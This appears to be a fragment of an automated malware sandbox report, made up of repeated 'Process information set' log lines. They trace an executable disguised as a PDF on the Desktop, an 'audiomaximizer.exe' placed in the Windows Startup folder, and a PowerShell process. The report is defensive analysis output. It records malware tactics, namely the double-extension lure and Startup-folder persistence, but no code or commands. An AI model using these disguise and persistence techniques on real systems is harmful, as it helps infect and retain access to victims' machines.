            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX
